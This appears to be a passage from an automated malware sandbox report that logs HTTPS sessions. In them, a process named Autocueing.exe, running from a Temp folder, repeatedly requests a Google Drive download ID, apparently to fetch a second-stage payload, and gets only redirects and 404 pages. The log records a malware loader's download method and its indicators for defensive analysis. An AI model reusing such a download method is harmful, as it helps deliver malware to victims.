                                                                                                                                                                                    2025-01-11 04:28:06 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4c 39 32 78 2d 61 45 2d 44 32 67 72 30 36 61 67 37 4e 46 6a 7a 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="L92x-aE-D2gr06ag7NFjzQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    6192.168.2.649988142.250.185.1424435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:28:07 UTC417OUTGET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:07 UTC1920INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:07 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-ky10nF8d9mkPGnwpINLBug' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    7192.168.2.649989142.250.185.1294435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:28:08 UTC459OUTGET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:09 UTC1844INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgSHmeiN_O0VkbagjCrcxRMEFDZuBCKj-tAQT-tPceKOD6oP3fA-M1oZ2BFPY2PVpCdC
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:09 GMT
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-dgimboZauwRnVMK3mAnD9w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2025-01-11 04:28:09 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5a 4e 62 4c 45 53 57 6e 68 6d 6e 62 4f 5f 4c 37 37 57 71 62 65 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ZNbLESWnhmnbO_L77Wqbew">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    8192.168.2.649990142.250.185.1424435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:28:10 UTC417OUTGET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:10 UTC1920INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:10 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-J-0ulqb91adqElQK1-GLhw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    9192.168.2.649991142.250.185.1294435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:28:11 UTC459OUTGET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:11 UTC1844INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgQNJqNFDAFPq5uccp9dyEHmJbLd3u_jSWKhlaQz1jyQNp_-3166CoQf1G9r14W5fIuM
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:11 GMT
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-zpfcBhQWZ6FO5PeGKGq2zA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2025-01-11 04:28:11 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 69 51 45 73 34 53 6a 68 39 78 64 6e 47 79 5a 36 7a 77 65 73 53 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="iQEs4Sjh9xdnGyZ6zwesSg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    10192.168.2.649992142.250.185.1424435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:28:12 UTC417OUTGET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:12 UTC1920INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:12 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-_jgiY9FppazYHNQ2DfLLwQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    11192.168.2.649994142.250.185.1294435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:28:13 UTC459OUTGET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:13 UTC1844INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgRlMbaq1Y-iqeLMwt6QrJy4v5SKHOWTR-YZPgGpYDLvwrF0OCWY4ITMIHnhx5emJdfk
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:13 GMT
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-j_T0DR8vgrQB2eDWrjKpjw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2025-01-11 04:28:13 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 47 77 36 38 6e 32 77 2d 52 6a 47 59 4d 30 4d 30 4b 51 77 6f 68 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Gw68n2w-RjGYM0M0KQwohA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    12192.168.2.649995142.250.185.1424435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:28:14 UTC417OUTGET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:15 UTC1920INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:15 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
